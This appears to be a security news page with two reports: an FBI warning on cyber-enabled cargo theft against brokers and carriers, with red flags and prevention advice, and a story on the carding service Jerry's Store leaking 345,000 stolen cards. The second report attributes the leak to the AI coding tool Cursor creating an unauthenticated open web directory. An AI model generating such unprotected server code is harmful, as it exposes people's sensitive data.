The FBI has issued a Public Service Announcement (PSA) about a surge in cyber-enabled cargo theft, with hackers increasingly targeting brokers and carriers. This trend confirms earlier findings from Proofpoint and alerts from the NMFTA, which noted that traditional cargo theft is being replaced by more sophisticated, digital attacks across the logistics sector.
“The Federal Bureau of Investigation is publishing this Public Service Announcement (PSA) to warn the public of cyber threat actors increasingly using sophisticated, cyber-enabled tactics to impersonate legitimate businesses to hijack freight, steal high-value shipments, and reroute deliveries, resulting in a surge of strategic cargo theft.” reads the FBI’s PSA.
Crooks are increasingly targeting the U.S. transportation and logistics sector, including brokers and carriers. Since 2024, attackers have used phishing emails, fake websites, and compromised accounts to gain access to systems. They impersonate legitimate companies and post fake load listings to trick victims into handing over goods, which are then diverted and resold.
“Since at least 2024, cyber threat actors have gained unauthorized access to the computer systems of brokers and carriers — typically via spoofed emails, fake URLs, and compromised carrier accounts.” continues the announcement. “The cyber actors pose as victim companies and post fraudulent listings on load boards to deceive shippers, brokers, and carriers into handing over goods, which are redirected from their intended destination and stolen for resale. “
In 2025, cargo theft losses in the U.S. and Canada reached nearly $725 million, up 60% from 2024. Incidents rose 18%, while the average loss per theft increased 36% to $273,990, reflecting a shift toward fewer but higher-value targets.
Cyber-enabled cargo theft follows a structured, multi-step scheme. Attackers first compromise broker or carrier accounts using phishing emails and fake links that install remote access tools. With control of these systems, they impersonate companies and post fake loads on trucking platforms, tricking legitimate carriers into engaging and sometimes infecting them too.
Next, criminals pose as trusted carriers to accept real shipments, then “double-broker” them to unsuspecting drivers while altering documents and delivery details. They may even update official records to appear legitimate.
Finally, the cargo gets redirected, transferred to complicit drivers, and stolen for resale. In some cases, attackers demand ransom to reveal shipment details or location.
The PSA includes indicators to spot cyber-enabled cargo theft attacks. These include unexpected contacts about shipments made in their name without authorization, and emails that mimic real domains but use free providers or slight variations. Messages may push users to click shortened or spoofed links, often tied to fake complaints or documents that deliver malware.
Other red flags include new or suspicious mailbox rules, such as auto-forwarding or deletion. Attackers also use altered email addresses with small changes or added titles. Communication often comes via email or short-lived VoIP phone numbers, sometimes linked to overseas activity.
To prevent cargo theft, businesses should verify shipments using independent and multiple channels before releasing goods. Do not trust names or emails alone—confirm requests with additional authentication. Keep detailed records of drivers, vehicles, and transactions to support investigations and reduce fraud risks.
Companies can spot cyber-enabled cargo theft through several warning signs. These include unexpected contacts about shipments made in their name without authorization, and emails that mimic real domains but use free providers or slight variations. Messages may push users to click shortened or spoofed links, often tied to fake complaints or documents that deliver malware.
Other red flags include new or suspicious mailbox rules, such as auto-forwarding or deletion. Attackers also use altered email addresses with small changes or added titles. Communication often comes via email or short-lived VoIP phone numbers, sometimes linked to overseas activity.
FBI recommends businesses should verify shipments using independent and multiple channels before releasing goods. Do not trust names or emails alone, confirm requests with additional authentication. Keep detailed records of drivers, vehicles, and transactions to support investigations and reduce fraud risks.
Recently Proofpoint researchers observed crooks targeting trucking and logistics companies, running coordinated remote access campaigns to steal cargo and divert payments. These attacks appear to be linked to organized crime.
The findings highlight a growing trend of cyber-enabled cargo theft, where digital intrusions directly support real-world crime. This threat is expanding rapidly, with losses in North America reaching $6.6 billion in 2025, showing how cyberattacks are increasingly used to disrupt supply chains and generate profit.
In November 2025, Proofpoint first reported cybercriminals were targeting trucking and logistics firms with RMM tools (remote monitoring and management software) to steal freight. Active since June 2025, the group works with organized crime to loot goods, mainly food and beverages.
Crooks infiltrate logistics firms, hijack cargo bids, and steal goods, fueling the rise of cyber-enabled freight theft.
Jerry’s Store, a card-checking service used by cybercriminals, exposed 345,000 stolen payment cards after leaving its server open, revealing sensitive data.
A cybercriminal operation known as Jerry’s Store has reportedly exposed a large cache of stolen payment card data after leaving its own infrastructure accessible online. The service appears to have been used to test whether stolen credit and debit card details were still valid, effectively acting as a verification tool for fraudsters before the data was resold or abused.
“Jerry’s Store marketplace leaked 345,000 stolen credit card details through an exposed, insecurely configured server created using AI assistance.” reads the report published by CyberNews.
“The leak occurred after Cursor AI generated flawed code without authentication, exposing credit card numbers, names, addresses, and security codes.”
Researchers found that the exposed server contained information linked to roughly 345,000 payment cards. Of those, nearly 200,000 cards had been marked as invalid by the service, while more than 145,000 records were identified as valid. The leaked records reportedly included highly sensitive cardholder data such as card numbers, expiration dates, security codes, names, and billing addresses. Cybernews
The incident is notable not only because of the volume of exposed data, but also because it shows how organized and automated parts of the carding economy have become. Instead of manually checking stolen cards one by one, criminal marketplaces and fraud services increasingly rely on infrastructure that can validate payment data at scale. Once a card is confirmed as active, it becomes more valuable for resale, fraud attempts, or account takeover activity.
Cybernews estimated that valid stolen card records typically sell for around $7 to $18 on dark web markets. Using that range, the valid card data exposed through Jerry’s Store could be worth between $1 million and $2.6 million. The true value of the broader operation may be higher, since the platform reportedly handled more than just the leaked payment-card records.
CyberNews researchers found that Jerry’s Store operators used Cursor, an AI coding tool by Anysphere, to build their server and admin dashboards. However, flawed guidance from the AI likely led to misconfigurations, leaving the system exposed and causing the data leak.
“We were able to confirm that the leak originated from the user asking to create a statistics dashboard, and Cursor created an unauthenticated open web directory to serve the webpage, ignoring the need to set up authentication or ensure that only the intended dashboard would be accessible,” CyberNews team explained.
Source CyberNews: Jerry’s Store data leakSource CyberNews: Jerry’s Store data leak
The case is ironic: a cybercriminal service built to profit from stolen card data exposed itself due to poor security. This failure creates added risk for victims, as data already circulating in underground markets can spread further, reaching new attackers who did not originally steal it.
The story also highlights a wider trend in cybercrime: illicit services are becoming more productized. Carding shops, validation tools, automated fraud services, and dark web marketplaces increasingly resemble commercial platforms, with pricing models, customer interfaces, and backend infrastructure. Rapid7 has described this broader ecosystem as “carding-as-a-service,” where stolen cards and fraud tooling are packaged for easier use by criminals with varying levels of technical skill.
A similar pattern has been seen in other carding-related incidents. BidenCash, a carding-focused marketplace, became known for releasing large batches of stolen payment-card data as a promotional tactic to attract users and vendors.
Law enforcement has also targeted related ecosystems. In a case involving B1ack’s Stash, authorities seized domains tied to underground vendors trafficking stolen financial data, including payment-card records. That case underlines how carding markets remain a priority for investigators because they support a chain of downstream crimes, from unauthorized purchases to identity theft and money laundering.
Consumers should closely monitor accounts, enable alerts, use virtual cards, and replace compromised ones. Banks must strengthen fraud detection, quickly block stolen cards, and monitor underground markets.
The Jerry’s Store leak shows that even cybercriminal platforms can have weak security. When they fail, the impact still hits ordinary users, whose stolen card data may spread further and be reused, traded, and exploited across the fraud ecosystem.
Entrar
